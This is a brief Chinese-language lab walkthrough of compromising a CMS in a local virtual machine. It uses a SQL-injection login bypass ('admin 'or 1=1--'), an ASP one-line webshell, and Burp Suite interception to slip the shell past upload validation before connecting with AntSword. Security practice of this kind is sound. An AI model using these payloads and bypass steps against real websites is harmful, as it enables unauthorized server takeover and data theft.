前期准备
软件:burp,中国蚁剑
环境:酷维网站,VM虚拟机
具体操作
1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(一句话木马上传点)
2.调出属性,修改为IP,应用后确定
3.用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面
使用万能密码 账号:admin 'or 1=1-- 密码:任意
进入后去添加公告里找上传点
4.打开burpsuit,配置一下proxy(switchy omega)
上传+绕过有两个方法
方法1
制作一句话木马图片(传前格式验证)
参考------https://blog.csdn.net/weixin_45571987/article/details/115426542
访问上传路径,上传成功
后台数据库也有显示
这里有点问题,jpg蚁剑连不了,要php格式的文件,连接失败
这种适合传前格式验证,上传后bp抓包改jpg后缀为php才能用蚁剑连接
方法2
burp绕过(传后格式验证)
制作1.asp一句话木马
文本输入<%eval request ("POST")%>
另存为
在1.asp文件里一句话木马前面多加一些文字信息------为了使文件容量变大,要不然网站识别不了
上传后抓包,修改文件路径为bookpic/a.asp/,再修改文件上传后缀为jpg,放行,拦截关闭
访问路径:IP/bookpic/a.asp/20246215171536061.jpg
没有显示php代码说明解析成功
中国蚁剑连接成功